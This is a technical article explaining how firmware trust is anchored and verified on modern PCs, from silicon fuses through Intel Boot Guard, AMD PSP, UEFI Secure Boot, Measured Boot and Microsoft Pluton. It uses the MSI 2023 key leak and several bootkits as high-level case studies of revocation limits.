flowchart LR G1["Gen 1: Trust by physical inaccessibility, pre-2011"] G2["Gen 2: Signed BIOS update anchored in BIOS, 2011 to 2013"] G3["Gen 3: Silicon root of trust via Boot Guard and PSP, 2013 onward"] G4["Gen 4: Secure Boot and discrete TPM, 2012 onward"] G5["Gen 5: fTPM on CSME and PSP, 2015 onward"] G6["Gen 6: Microsoft Pluton, 2020 onward"] G7["Gen 7: Open multi-signer root of trust via Caliptra, prospective"] G1 --> G2 --> G3 --> G4 --> G5 --> G6 --> G7

The genealogy is a chain of trades, not a chain of unambiguous improvements. Gen 2 added a revocation surface and unanchored it. Gen 3 anchored the chain in silicon and removed the revocation surface. Gen 4 (Secure Boot, parallel to Gen 3) restored revocation above the firmware layer via the dbx deny-list but did not extend revocation to the fuse. Every move from one generation to the next migrated the failure surface to a different layer. The chain that ships in 2026 is the live composition of Gens 3 through 7, not a clean replacement.

If the trust anchor is now a silicon fuse, what exactly does the silicon do at boot -- and why does Intel's path differ from AMD's?

3. The Two-Vendor Stack: Intel Boot Guard plus CSME, AMD PSP plus PSB

Here is a fact that surprises most x86 engineers the first time they read it carefully. On a modern AMD desktop, an ARM Cortex-A5 with TrustZone boots before the x86 cores are released from reset. The x86 bootstrap processor (BSP) only comes out of reset after the on-die ARM core has verified the BIOS image in SPI flash and decided the platform is allowed to start [@wiki-amd-psp] [@amd-psb-whitepaper]. The "x86 PC" is, at boot, an ARM system-on-chip pretending to be an x86 PC for the first few hundred milliseconds.

Intel takes the opposite architectural shape. On an Intel system the BSP comes out of reset first, but the very first instructions it executes are an Intel-signed binary called the Authenticated Code Module (ACM) which runs inside the CPU package itself, gated by microcode that verifies the ACM signature against a public-key hash that has been fused into the silicon at manufacturing time [@eclypsium-publications]. The first thing your CPU does is verify a manifest signed by Intel that tells it where the OEM's keys live.

A small, Intel-signed binary that the CPU loads from a known SPI region into the CPU cache as private memory and executes before any unsigned code can run. The ACM is verified against a public key whose hash is fused into the chipset Field Programmable Fuse at silicon manufacturing time. The Boot Guard ACM is the verifier that walks the OEM-signed Key Manifest and Boot Policy Manifest. The TXT SINIT ACM is a separate, later-stage ACM used by Intel TXT for dynamic root-of-trust measurement. An array of one-time-programmable polysilicon fuses inside Intel's PCH (or, on Skylake and later, integrated into the CPU package) that the OEM blows during board manufacturing to record the hash of the OEM's Boot Guard public key, the chosen Boot Guard profile (verified-only, measured-only, or both), and the lock state. Once blown, the FPF cannot be unblown. The FPF is the bottom of the OEM-controlled portion of the Intel trust chain; below it sits the silicon-fused Intel public key that authenticates the ACM itself. An OEM-signed manifest that tells the Boot Guard ACM which SPI regions form the Initial Boot Block, what cryptographic hash to expect over those regions, which Boot Guard profile to enforce, and (on profile 4 or 5) what to do on verification failure. The BPM is signed with the OEM Boot Policy Key, which is itself authenticated against the Key Manifest, which is itself authenticated against the FPF. An ARM Cortex-A5 with TrustZone, integrated as a coprocessor on the AMD CPU die from Family 16h forward, that boots before the x86 cores are released from reset [@wiki-amd-psp]. The PSP runs its own boot ROM (immutable silicon), loads PSP firmware from a known SPI directory, verifies that firmware against the AMD root-key hash, and (on platforms with PSB enforced) verifies the OEM-signed BIOS image before releasing the x86 BSP from reset. The AMD architectural feature that has the PSP measure and verify the BIOS image against an OEM-key fuse before releasing the x86 cores [@amd-psb-whitepaper]. PSB ships in two activation states: PSB-capable (PSP runs but does not enforce verification) and PSB-enforced (the OEM has burned the OEM-key hash into the PSP fuse, and the PSP will halt the platform on verification failure). PSB-enforced on EPYC is widely deployed; on Ryzen it has historically been opt-in per platform.

Intel: Boot Guard, CSME, and the manifest chain

Inside an Intel platform the verifier walk is precise enough to render as a list:

The Boot Guard ACM loads into a protected region of CPU cache and executes inside the CPU package.
It reads the FPF for the OEM key hash and the active profile bits.
It pulls the Key Manifest (KM) from SPI and verifies the KM signature against the FPF-stored hash.
It pulls the Boot Policy Manifest (BPM) and verifies the BPM signature against the KM public key.
It hashes the SPI regions declared by the BPM as the Initial Boot Block (IBB) and compares the hash against the BPM-declared expected value.
On a match, it transfers control to the IBB and the chain proceeds.
On a mismatch, it halts (profile 4 and profile 5) or extends PCR 0 with the measurement and continues (profile 3) [@eclypsium-publications].

The Bulygin BH EU 2018 reverse engineering remains the most readable primary on the actual code path [@eclypsium-publications].

Separately, while the CPU is doing the Boot Guard walk, the CSME runs its own startup sequence on its own core, with its own MINIX 3 runtime [@intel-csme-whitepaper]. Once stable, it exposes three optional services [@intel-csme-whitepaper]:

Intel Active Management Technology (AMT). Out-of-band management; only on systems where the OEM has enabled it in firmware.
Intel Platform Trust Technology (PTT). A TPM 2.0 endpoint implemented in CSME firmware, so the platform does not need a discrete TPM chip.
Intel Identity Protection Technology (IPT). Hardware-rooted one-time-password generation.

Each service depends on CSME being trustworthy. And CSME's own runtime is verified, at boot, by the chain we have just walked.

AMD: PSP boot ROM, PSP firmware, and the OEM-key fuse

The AMD walk is structurally simpler and architecturally cleaner. The PSP boot ROM is silicon -- it cannot be modified after fabrication. It reads the PSP directory from a known SPI offset, validates the directory header, loads the PSP firmware image, and verifies that image against the AMD root-key hash that is part of the PSP boot ROM itself [@amd-psb-whitepaper]. On a PSB-enforced platform, the PSP then loads the OEM PSB key, verifies it against the OEM-key hash fused in the PSP, and uses the OEM PSB key to verify the OEM-signed BIOS image before releasing the x86 BSP from reset.

The "separate core boots first" architectural primitive is a different kind of isolation than Intel's "microcode plus signed ACM." Intel's verifier runs in the CPU package but inside a protected cache region. AMD's verifier runs on a physically separate core with its own memory map. Neither is obviously better. Both shift the trust anchor out of writable storage and into silicon.

The ARM Cortex-A5 implements ARMv7-A and ships TrustZone. TrustZone partitions execution into a Non-Secure World (the Rich Execution Environment, REE) and a Secure World (the Trusted Execution Environment, TEE) with hardware-enforced isolation. The PSP runs its boot ROM and firmware in the Secure World [@wiki-amd-psp].

CSME generation	Core	Runtime	Era
ME 1 -- ME 10	ARC	ThreadX	2006 -- 2014
ME 11 (Skylake)	Intel Quark x86	MINIX 3	2015 -- 2018
CSME (Ice Lake+)	Tremont-class x86	MINIX 3	2019 -- present

Sources: [@wiki-ime] [@wiki-ime-history].

The generational table for the Intel side has been the source of several recurring errors in secondary literature: claims that "every CSME runs MINIX" are wrong (the ARC-based ME 1 through ME 10 ran ThreadX), and claims that "CSME still runs on Quark" are equally wrong (Ice Lake and later moved to a Tremont-class x86 core but kept the MINIX 3 runtime) [@wiki-ime] [@wiki-ime-history].

AMD has not published a complete PSP architectural document. The PSB whitepaper [@amd-psb-whitepaper] covers the PSB-flow at a marketing-architecture level; the PRO security whitepaper [@amd-pro-whitepaper] is the broadest vendor primary. Everything else about the PSP -- the runtime, the directory layout, the soft-fuses, the glitch surface -- flows through community reverse engineering. The most useful primaries are Buhren and Werling's voltage-glitching corpus at TU Berlin (now indexed via the Fraunhofer publication record) [@fraunhofer-amd], the Buhren / Jacob / Krachenfels / Seifert "One Glitch to Rule Them All" CCS 2021 paper [@one-glitch-2021], the Jacob / Werling / Buhren / Seifert "faulTPM" USENIX Security 2024 paper (arXiv v1 submitted April 28, 2023) [@faultpm-2023], the open PSPReverse toolchain on GitHub [@pspreverse-org] [@psp-glitch-repo], and Matthew Garrett's 2022 reverse engineering of the PSP directory entry 0xB BIT36 "soft fuse" that gates Pluton on Ryzen 6000 [@garrett-pluton-2022]. The "AMD has not published" caveat travels with every architectural claim about the PSP in this article.

The hedge matters for one specific premise: the ARM Cortex-A5 + TrustZone architectural claim is well-attested for Family 15h and Family 17h via the Buhren / Werling / Jacob / Seifert reverse-engineering corpus [@one-glitch-2021] [@faultpm-2023] [@wiki-amd-psp]. The specific core in Family 19h+ is not publicly documented. The widely-repeated "Cortex-A7" claim is unsupported by any vendor primary I could verify. This article uses "Cortex-A5 with TrustZone" only where Family 15h / 17h is in scope and says "the PSP" generically elsewhere.

Now that we know who the verifiers are, let us watch them work -- one rung at a time -- from CPU reset to winload.efi.

4. The Chain Walk: From CPU Reset to winload.efi

Eleven rungs. We will walk each one in order. By the end you will know exactly what gets verified, by what, against what trust anchor, and what happens when that verification fails.

flowchart TD R["CPU reset, vector at 0xFFFFFFF0"] subgraph IB["Intel Boot Guard"] I1["Microcode loads ACM from SPI"] I2["ACM verified vs silicon-fused Intel key"] I3["ACM reads FPF: OEM key hash plus profile bits"] I4["KM signature verified vs FPF hash"] I5["BPM signature verified vs KM public key"] I6["IBB regions hashed and compared to BPM"] I7["Profile 4 or 5 halts on mismatch, Profile 3 extends PCR 0"] I1 --> I2 --> I3 --> I4 --> I5 --> I6 --> I7 end subgraph AP["AMD PSP plus PSB"] A1["PSP boot ROM (silicon, immutable) executes"] A2["PSP firmware loaded from SPI PSP directory"] A3["PSP firmware verified vs AMD root key hash"] A4["OEM PSB key loaded from SPI"] A5["OEM PSB key verified vs OEM-key fuse"] A6["BIOS image verified vs OEM PSB key"] A7["x86 BSP released from reset"] A1 --> A2 --> A3 --> A4 --> A5 --> A6 --> A7 end R --> I1 R --> A1 I7 --> H["Hand-off to IBB and SEC phase"] A7 --> H

4.1 Reset and microcode bootstrap

The x86 CPU starts executing at physical address 0xFFFFFFF0 per the Intel SDM Volume 3A §9.1.4 ("First Instruction Executed") specification [@intel-sdm-vol3a], which the chipset aliases into the SPI flash region containing the reset vector.That address is sixteen bytes below the top of 32-bit physical memory; the first instruction is typically a near jump down into the bulk of the firmware. The very first action is a microcode load: the CPU executes its built-in microcode, which then loads any microcode patches from a known SPI region. On Intel platforms the microcode patch is itself signed against an Intel public key burned into silicon. On AMD platforms the equivalent step is the PSP boot ROM execution, which happens slightly earlier in wall-clock time because the PSP starts before the x86 BSP is released [@wiki-amd-psp].

4.2 Intel ACM execution and AMD PSP first-stage boot

The Intel ACM is signed by Intel and stored in SPI. The microcode loader verifies the ACM signature against the silicon-fused Intel public key and runs the ACM inside a protected region of cache. The AMD analogue is the PSP boot ROM, which is silicon and therefore cannot be modified after fabrication. Both architectures share the invariant: the first executable code path is anchored in silicon, not flash.

4.3 FPF and OEM-fuse policy read

On Intel, the ACM reads the FPF to learn the hash of the OEM Boot Guard public key and the active Boot Guard profile. It then verifies the Key Manifest (KM) signature against the FPF hash, and the Boot Policy Manifest (BPM) signature against the KM public key. The KM and BPM together form a two-level OEM signing structure: the KM authenticates a set of permitted Boot Policy signing keys, and the BPM names the IBB regions and their expected hash.

On AMD, the PSP reads the PSP directory from a known SPI offset, authenticates the directory entries against the AMD root key, and (on PSB-enforced platforms) authenticates the OEM PSB public key against the PSP-fused OEM-key hash before validating the BIOS image [@amd-psb-whitepaper].

4.4 IBB verification and SEC phase

The first chunk of UEFI firmware that the lower-rung silicon verifier cryptographically covers. On Intel platforms with Boot Guard, the IBB regions are declared by the BPM and hashed by the ACM. On AMD platforms with PSB, the equivalent role is played by the PSP-verified BIOS image as a whole. The IBB is where UEFI's own code path begins.

After IBB verification succeeds, control transfers to the IBB itself. The IBB executes the SEC (Security) phase of the EDK II firmware lifecycle: it sets up the cache as RAM, enables initial CPU features, and prepares to hand off to PEI.

Intel's umbrella term, introduced with Skylake (ME 11) in 2015, for the on-die security processor that runs alongside the x86 cores and provides services to the platform: firmware TPM (PTT), AMT, identity protection, secure storage, and the runtime verifier for some pre-OS measurements [@intel-csme-whitepaper] [@wiki-ime]. CSME runs its own RTOS on its own core and is the single most complex piece of pre-OS firmware on a modern Intel platform.

4.5 PEI and DXE phases

The PEI (Pre-EFI Initialization) phase completes memory controller initialisation and discovers the platform's DRAM. The DXE (Driver eXecution Environment) phase then loads UEFI drivers (storage, USB, network, video, and platform-specific drivers) and brings the UEFI services online. The TianoCore EDK II reference UEFI implementation [@edk2-repo] is the canonical open-source codebase for studying PEI and DXE in detail, and every commercial vendor BIOS is structurally a fork of EDK II with proprietary platform code.

"SPI flash" on a modern platform is not one trust domain. The main BIOS SPI region is what Boot Guard / PSB verify. But a modern PC may also have separate SPI or NVRAM regions for the Embedded Controller (keyboard, battery, lid sensor), the Thunderbolt controller, the fingerprint reader, and on servers the baseboard management controller (BMC). Each of those has its own update mechanism, its own verifier (if any), and its own attack surface. The article will revisit this in section 8.

4.6 DXE Secure Boot variable evaluation

During DXE the UEFI runtime brings the Secure Boot variable services online. The Platform Key (PK), Key Exchange Keys (KEK), Authorized Signature Database (db), and Forbidden Signature Database (dbx) are stored as UEFI authenticated variables in NVRAM, per UEFI Specification §8 [@uefi-specs]. When DXE loads a UEFI binary, the verifier compares the binary's Authenticode signature against db entries, refuses to load binaries whose hash appears in dbx, and (in the default policy) refuses to load binaries that do not match any db entry.

The companion article on Secure Boot covers the PK / KEK / db / dbx model and the SBAT generation-number deny-list in detail. The point for this chain walk is that Secure Boot itself does not start until DXE has set up the UEFI variable services, and DXE itself only runs because the IBB verified by Boot Guard / PSB executed correctly.

Note: This is rung 5 of 11. The rungs above this one -- Secure Boot policy, TPM PCR semantics, Pluton silicon enumeration, ACPI table integrity, Secured-core PC configuration -- are covered in the companion articles. The lane of this article is the rungs below Secure Boot. From here forward we summarise the upper rungs only enough to show where the trust chain hands off.

4.7 Boot Device Selection and bootmgfw.efi

After DXE completes, the BDS (Boot Device Selection) phase enumerates the boot variables stored in NVRAM, finds the first valid EFI_LOAD_OPTION, and loads the EFI binary it points to. On Windows that is \EFI\Microsoft\Boot\bootmgfw.efi. On Linux estates running shim it is \EFI\<distro>\shimx64.efi, which is the first non-Microsoft binary the chain consents to load and which then verifies a distro-signed second-stage loader (GRUB2 in most cases) [@garrett-shim-19448].

4.8 Boot Manager verifies winload.efi; Measured Boot extends PCR 0 through 7

The Windows Boot Manager (bootmgfw.efi) verifies winload.efi against its built-in trust anchor, then asks the TPM to extend a sequence of PCR measurements covering the chain it has just walked. Per the TCG PC Client Platform Firmware Profile, PCRs 0 through 7 cover (0) the platform SRTM and firmware, (1) host platform configuration, (2) UEFI drivers and option ROMs, (3) UEFI driver and application configuration, (4) the boot manager code and boot attempts, (5) boot manager configuration and the GPT, (6) host-platform-manufacturer-specific events, and (7) the Secure Boot policy [@tcg-tpm-lib]. The companion article on Measured Boot covers the PCR semantics in detail.

4.9 Hand-off to winload.efi

winload.efi loads the NT kernel, the early-launch antimalware drivers, and the Code Integrity policy. The Windows OS-side trust chain takes over from here. This article ends its lane at the hand-off.

{// Toy SHA-256 substitute (NOT cryptographically real -- demonstrates the extend chain only). function hashHex(s) { let h = 2166136261; for (const c of s) h = ((h ^ c.charCodeAt(0)) * 16777619) >>> 0; return h.toString(16).padStart(8, '0').repeat(8); } function extend(pcr, measurement) { return hashHex(pcr + measurement); } const pcr0 = '00'.repeat(32); const afterAcm = extend(pcr0, 'ACM-binary@SPI:0x10000'); const afterIbb = extend(afterAcm, 'IBB-region@SPI:0x100000'); const afterDxe = extend(afterIbb, 'DXE-driver-set-vendor-A'); const afterSb = extend(afterDxe, 'SecureBoot-policy:PK=hashA,KEK=hashB,db=hashC,dbx=hashD'); const afterBm = extend(afterSb, 'bootmgfw.efi:authenticode=hashE'); const afterLoad = extend(afterBm, 'winload.efi:authenticode=hashF'); console.log('PCR0 after ACM ->', afterAcm.slice(0, 32) + '...'); console.log('PCR0 after IBB ->', afterIbb.slice(0, 32) + '...'); console.log('PCR0 after DXE ->', afterDxe.slice(0, 32) + '...'); console.log('PCR7 after PolicyB->', afterSb.slice(0, 32) + '...'); console.log('PCR4 after BootMgr->', afterBm.slice(0, 32) + '...'); console.log('PCR4 after WinLoad->', afterLoad.slice(0, 32) + '...'); console.log(); console.log('Change ANY measurement and the chain hash diverges from quote-expected value.');}

Eleven rungs. Each rung's verifier inherits the trust of the rung below it. That single property -- inheritance -- is what makes the next section's argument inevitable.

5. The Breakthrough: The Hardware Fuse as Root of Trust, and the Asymmetric Revocation Surface

The strongest layer in the chain is the layer you cannot fix. That is not a bug. It is the definition of a hardware root of trust -- and it is also why the MSI 2023 leak is permanent.

The architectural insight is structural. Trust must be anchored somewhere, and the only place that survives an OS reinstall, a BIOS reflash, an SPI chip swap, and a malicious bootloader is a piece of silicon that the attacker cannot rewrite without replacing the chip. One-time-programmable polysilicon fuses give exactly that property. Burn the OEM key hash into the FPF at manufacturing time, and from that point forward only OEM-signed firmware will run on that board. The fuse is "the bottom" by construction.

The cost is symmetric. One-time programmable means one-way trust. Once an OEM's public key hash is burned, it cannot be removed without replacing the chip. If the OEM later loses control of the corresponding private key, the public-key hash that authenticates everything signed by that private key is still in the fuse. The fuse layer has no revocation primitive.

Key idea: Trust strength and revocation expressiveness move in opposite directions as you descend the pre-boot trust chain. The fuse layer is the strongest because nothing can change it -- which is exactly why nothing can revoke it. Permanence is the source of both properties, not a side effect of one.

This is the article's load-bearing observation, and it is worth making concrete. Going up the chain from the fuse, the revocation surface gets progressively more expressive.

A monotonically increasing version number embedded in a signed firmware artifact (boot manager, ACM, microcode patch). When the platform's stored SVN floor is bumped, the platform refuses to load any artifact whose embedded SVN is below the floor. SVN bumps are an alternative to per-hash revocation that scales better as the number of bad artifacts grows, but they require the firmware vendor to maintain an SVN namespace and to bump it on every revocation event. A generation-number revocation model introduced by the rhboot shim project to replace per-hash dbx revocation for shim and downstream components [@sbat-md]. Each shim, GRUB2 build, and second-stage component embeds a vendor-specific SBAT generation. When a vulnerability is found, the vendor publishes a new shim with an incremented generation. The shim verifier on the running platform refuses to load any component with a generation lower than the platform's stored floor. As the SBAT documentation notes, "This single revocation event consumes 10kB of the 32kB, or roughly one third, of revocation storage typically available on UEFI platforms" [@sbat-md], which is exactly the dbx exhaustion problem SBAT is designed to solve.

At the top of the chain, on a Pluton-equipped platform, Microsoft can ship Pluton firmware updates through Windows Update [@pluton-learn]. That is the most expressive revocation surface on the chain: software cadence, OS-mediated delivery, no OEM gating on the runtime channel after initial enrolment. (The SPI-resident Pluton firmware loaded at every boot is still updated through the OEM's UEFI capsule pipeline; the OS-mediated runtime channel sits on top of it [@pluton-learn].)

Below Pluton, SBAT denies entire classes of vulnerable shim binaries with one generation bump [@sbat-md]. Below SBAT, dbx denies individual bootloader hashes (with the ~32 KB capacity constraint that SBAT exists to relieve). Below dbx, KEK and PK are progressively more permanent because they sit at the root of UEFI's variable-authentication structure, and any change requires a Platform Key signature. Below the UEFI variables, the OEM Boot Policy Manifest is replaced only by an OEM-signed firmware update. And below the BPM, the FPF / OEM-key fuse is unrecoverable.

flowchart TD L0["Pluton firmware via Windows Update: software cadence"] L1["SBAT generation bump: revoke an entire class with one entry"] L2["dbx hash list: revoke per-binary, capped at roughly 32 KB"] L3["KEK and PK: revoke only via Platform Key signature"] L4["OEM Boot Policy Manifest: replaced by OEM-signed firmware update"] L5["FPF / OEM-key fuse: NO REVOCATION PRIMITIVE"] L0 --> L1 --> L2 --> L3 --> L4 --> L5

MSI 2023 as the worked example

The April 2023 MSI leak is the existence proof. The FPF on every affected Intel platform stores the SHA-256 hash of the OEM Boot Guard public key. The corresponding private key is now public. There is no operational path to revoke that hash at the fuse layer without physical chip replacement. The only "revocation" surfaces available to a platform owner are upper-layer compensations, and each one has a structural limit:

An OS-level driver block list does not apply at boot, because the OS does not exist yet.
A dbx update can deny specific malicious firmware images by hash, but the attacker can sign a new image with the leaked key and rotate around the deny-list, exactly the way per-hash deny-lists always fail against an attacker who controls the signing oracle.
An Intel BIOS Guard SVN bump can raise the SVN floor, but the OEM has to sign the updated firmware -- using the same Boot Guard signing infrastructure that has been compromised. The leaked key signs the SVN bump too.

Help Net Security's contemporaneous reporting captured the counts that make the impact concrete: "private code signing keys for firmware images used on 57 MSI products, and private signing keys for Intel Boot Guard used on 116 MSI products ... one of the leaked keys has been detected on devices from HP, Lenovo, AOPEN, CompuLab, and Star Labs" [@helpnet-msi-leak]. The Register confirmed the affected platform generations as Tiger Lake, Alder Lake, and Raptor Lake [@register-msi-alt]. Binarly's per-device catalogue lists the affected SKUs in detail [@binarly-supply-chain].

Every Intel chip with the leaked OEM key hash burned in is permanently downgraded to a weaker trust model -- and nothing in the layers above can recover what the fuse layer lost.

SBAT exists for exactly the kind of revocation expressiveness the fuse layer lacks [@sbat-md]. SBAT is the negative-space comparator: this is what fuse-layer revocation could look like if it existed. It does not exist. That is the breakthrough -- and the limit -- of Gen 3 silicon roots of trust on commodity client platforms in 2026.

If the fuse is unrecoverable, what does the rest of the modern stack do to compensate?

6. State of the Art: What a Modern Pre-Boot Trust Chain Looks Like in 2026

In 2026 the chain has settled into a recognisable shape on Secured-core PCs and EPYC servers. Here is what is shipping, and what each piece is for.

The current best-practice configuration is roughly: Boot Guard or PSB enforced at the silicon verifier rung; BIOS Guard for runtime SPI write protection; SMM locked down via Intel TXT or AMD SKINIT; Measured Boot extending PCRs into a TPM 2.0 endpoint (discrete TPM, Intel PTT, AMD fTPM, or Microsoft Pluton); Windows DRTM enabled (extending PCR 17 through PCR 22); and the KB5025885 boot-manager revocation programme applied as it rolls out across 2025 and 2026 [@kb5025885].

KB5025885: db plus dbx plus SVN, not "PK rotation"

A late-launch primitive (Intel TXT via the SINIT ACM, or AMD SKINIT via the SLB) that re-anchors the trust chain after the static root has done its work. DRTM allows the OS to enter a measured launch environment in which a small, trusted hypervisor or secure kernel is loaded and measured into PCRs 17 through 22, independent of the firmware boot chain. Windows DRTM uses TXT or SKINIT to bring the Secure Kernel and Hypervisor Code Integrity online with a fresh chain of measurements.

Note: Press coverage frequently described KB5025885 as a "PK rotation" or "Microsoft rotating the Platform Key." It is neither. The Microsoft support article spells out the actual mechanism: KB5025885 adds the Windows UEFI CA 2023 certificate (PCA2023) to the Database Key (DB) and adds the hashes of vulnerable boot manager binaries to the Forbidden Signature Key (DBX) [@kb5025885]. The Platform Key itself is not modified by KB5025885. The MSRC blog framing is consistent: KB5025885 is a staged-rollout programme for managing the revocation of vulnerable Windows boot manager binaries associated with CVE-2023-24932 [@msrc-blog-2023-24932] [@msrc-cve-2023-24932].

KB5025885 was originally published on May 9, 2023 as part of May 2023 Patch Tuesday, in response to CVE-2023-24932 (a Secure Boot Security Feature Bypass) [@cve-2023-24932-nvd] [@kb5025885]. The CVE was the underlying vulnerability that the BlackLotus bootkit had exploited via CVE-2022-21894 several months earlier [@eset-blacklotus] [@cve-2022-21894-nvd]. Microsoft's response was structurally cautious: a multi-year staged rollout, rather than an immediate forced revocation, because forcing a dbx update that would brick any unpatched Windows install or any third-party EFI loader still in distribution would have been operationally catastrophic.

gantt dateFormat YYYY-MM-DD title KB5025885 boot manager revocation programme section Disclosure CVE-2023-24932 published :2023-05-09, 7d KB5025885 initial publication :2023-05-09, 7d section Deployment Manual deployment phase :2023-07-11, 270d Evaluation phase :2024-04-09, 90d Automatic enrollment phase :2024-07-09, 540d section Cutover Automatic certificate replacement :2026-01-01, 150d PCA2011 expiration window :2026-06-01, 30d

The rollout dates above follow the Microsoft KB5025885 article timeline [@kb5025885]: manual deployment beginning July 11, 2023; evaluation phase beginning April 9, 2024; automatic enrolment of mitigations beginning July 9, 2024; automatic certificate replacement on Windows 11 beginning January 2026; and the PCA2011 / UEFI CA 2011 / KEK CA 2011 expiration window in June 2026. The mechanism throughout is db + dbx + SVN, not Platform Key rotation.

Pluton's structural role in the modern chain

Microsoft Pluton was announced on November 17, 2020 as a "chip-to-cloud" security processor co-designed with AMD, Intel, and Qualcomm Technologies [@pluton-blog]. The current Microsoft Learn enumeration of Pluton silicon as of 2024 reads: "AMD: Ryzen 6000, 7000, 8000, 9000 and Ryzen AI Series processors; Intel: Core Ultra 200V Series, Ultra Series 3 and Series 3 processors; Qualcomm: Snapdragon 8cx Gen 3 and Snapdragon X Series processors. ... Pluton platforms in 2024 AMD and Intel systems will start to use a Rust-based firmware foundation" [@pluton-learn].

Pluton's structural contribution to the chain is the firmware-update channel. Discrete TPMs cannot be patched after manufacturing in any meaningful way. CSME PTT firmware ships through OEM BIOS updates with all the latency that implies. Pluton firmware reaches devices through two channels: the traditional OEM UEFI capsule that updates the SPI-resident Pluton image at boot, and an OS-mediated runtime channel through which Microsoft can ship new firmware via Windows Update [@pluton-learn] [@garrett-pluton-2022-update]. The second channel is the one no other shipping silicon root-of-trust has, and the one that closes the patch-latency gap.

Silicon comparison

Property	Intel Boot Guard	AMD PSB	Apple Silicon Boot ROM	Google Titan-M2	Microsoft Pluton
Trust anchor	FPF in PCH or package	OEM-key fuse in PSP / FCH	Mask ROM on the AP	On-die in Titan-M2 chip	On-die in SoC fabric
Revocation surface	None at fuse layer	None at fuse layer	Vendor seed (Apple)	Vendor seed (Google)	Microsoft via Windows Update
FW update channel	OEM BIOS	OEM BIOS	macOS updates	Android updates	Windows Update [@pluton-learn]
OS attestation API	TPM 2.0 quote (PTT)	TPM 2.0 quote (fTPM)	DeviceAttestationKey	KeyMint attestation	TPM 2.0 + Pluton-specific
Deployment posture	Widespread, OEM-gated	EPYC widespread, Ryzen opt-in	All Apple Silicon Macs	All Pixel 6 and later	Ryzen 6000+, Core Ultra, X-series

The asymmetry that matters for the article's argument is the third row. Apple, Google, and Microsoft control the firmware update channel for their respective trust anchors. Intel and AMD do not -- the OEM does, and the OEM's release cadence varies by vendor, by product line, and (for end-of-life models) drops to zero.

Bootkit comparison: same invariant, different break

Bootkit / vuln class	CVE	Vulnerable layer	Primitive	dbx state at disclosure	Fix mechanism
BlackLotus	CVE-2022-21894	Windows Boot Manager	baton drop on unpatched bootmgfw [@eset-blacklotus]	unpatched bootmgfw hashes not yet in dbx	KB5025885 dbx + db + SVN programme [@kb5025885]
BootHole	CVE-2020-10713 [@cve-2020-10713-nvd]	GRUB2 BootHole buffer overflow	GRUB2 cfg parser overflow [@eclypsium-boothole]	initial dbx update exhausted 10 KB of capacity	dbx hash list bump (SBAT later introduced to solve scale) [@sbat-md]
LogoFAIL	multiple in 2023	UEFI DXE image-parsing libraries	malicious BMP / PNG / JPEG in boot logo region	Boot Guard verifier passed; DXE parser exploited	per-OEM firmware update + library fixes [@binarly-logofail]
Bootkitty	(PoC, 2024)	User-controlled trust posture	Self-signed bootkit plus in-memory GRUB integrity-check patches before kernel hand-off [@bootkitty]	dbx unchanged for Bootkitty PoC	Keep Secure Boot enabled; audit MOK enrolments; SBAT is not the corrective surface for this class [@bootkitty]

The common pattern is the same invariant -- "the chain is only as strong as the rung that was broken" -- with four different break points:

BlackLotus broke at rung 9 (Boot Manager); the fix lived at rung 7 (Secure Boot policy via dbx).
BootHole broke at rung 10 (the chain-loaded GRUB2); the fix lived at rung 7 again (dbx, until SBAT replaced the per-hash approach).
LogoFAIL broke at rung 6 (a DXE image-parsing library); the fix had to live at rung 6 as well, because the verifier at rung 7 had already approved the binary.
Bootkitty did not break at shim or GRUB2; it operated alongside them, under the assumption Secure Boot was either disabled or the attacker's certificate had been pre-enrolled into MOK. ESET's primary disclosure confirms it is self-signed and patches GRUB integrity-check functions in memory after being loaded [@bootkitty].

The LogoFAIL story is especially instructive. Binarly's December 6, 2023 disclosure showed that Boot Guard validates the firmware image, but the image then parses attacker-controlled logo data through CVE-laden image parsers, executing attacker code in DXE without crossing any signature boundary [@binarly-logofail] [@binarly-logofail-slides] [@hackernews-logofail] [@darkreading-logofail].

Pluton is the most aggressive structural answer to the asymmetric-revocation problem on shipping silicon. But Pluton is not the only structural answer -- and even Pluton inherits one rung of OEM trust. The next section is the competing-approaches map.

7. Competing Approaches: Microsoft Pluton vs the Chipset Fuse Model

Pluton and Boot Guard are not competing for the same rung. They compose. Pluton sits in the SoC fabric on supported silicon and provides a TPM 2.0 service plus a Microsoft-controlled firmware-update channel; Boot Guard and PSB continue to verify the BIOS image at the silicon-verifier rung [@pluton-learn]. The interesting design fight is not Pluton-versus-Boot-Guard, it is Pluton-versus-the-OEM-controlled-fuse for the role of trust anchor of last resort.

Pluton's value proposition

Pluton's pitch, as Microsoft has articulated it since the November 2020 announcement, is to cycle the trust anchor from the OEM's fuse to a Microsoft-controlled root of trust that also lives in silicon but whose firmware can ship through Windows Update [@pluton-blog].

The trade is explicit: trust goes from "OEM, with no Microsoft visibility into key-management hygiene" to "Microsoft, with the platform integrated into Microsoft's signing infrastructure and update cadence."

The shift cuts two ways:

For organisations whose threat model treats OEM-key-management hygiene as the weakest link (and the MSI 2023 leak makes a strong empirical case for that view), Pluton is a structural improvement.
For organisations whose threat model treats Microsoft as a higher-risk root than the OEM, Pluton makes things worse on net.

The Pluton-present-is-not-Pluton-enabled trap

On April 11, 2022, Matthew Garrett published a reverse engineering of the ROG Zephyrus G14, an AMD Ryzen 6000 laptop, showing that "PSP directory entry 0xB BIT36 have the highest priority... If bit 36 is set, the PSP tells Pluton to turn itself off" [@garrett-pluton-2022].

The procurement consequence is easy to miss. Pluton-equipped silicon ships from AMD with Pluton present in the die, but the OEM can flip a single bit in the PSP firmware directory at manufacturing time that gates Pluton entirely. The platform passes "Pluton-equipped" advertising checks while Pluton is functionally disabled.

Garrett's December 2022 follow-up documented that Lenovo's ThinkPad Z13 shipped with Pluton default-disabled and exposed two ACPI device IDs (MSFT0101 and MSFT0200) that platform tooling could use to detect the configuration [@garrett-pluton-2022-update]. The operational lesson: "Has Pluton" is not the same question as "Pluton is enabled and acting as the TPM 2.0 endpoint."

Note: On Windows, Get-Tpm | Select-Object ManufacturerIdTxt, ManufacturerVersion returns the TPM 2.0 endpoint vendor and version. A Pluton-active platform reports MSFT as the manufacturer; a CSME PTT platform reports INTC; an AMD fTPM platform reports AMD; a discrete TPM reports the dTPM vendor (Infineon, Nuvoton, STMicroelectronics, etc.). This is the simplest field-confirmable check for which endpoint is actually serving as the TPM.

AMD PSB on EPYC versus Ryzen

AMD Platform Secure Boot has a deployment split that maps onto the consumer-versus-datacenter market structure. On EPYC, PSB-enforced is widely deployed: the datacenter customer wants the silicon-rooted verifier and is willing to accept the cost.

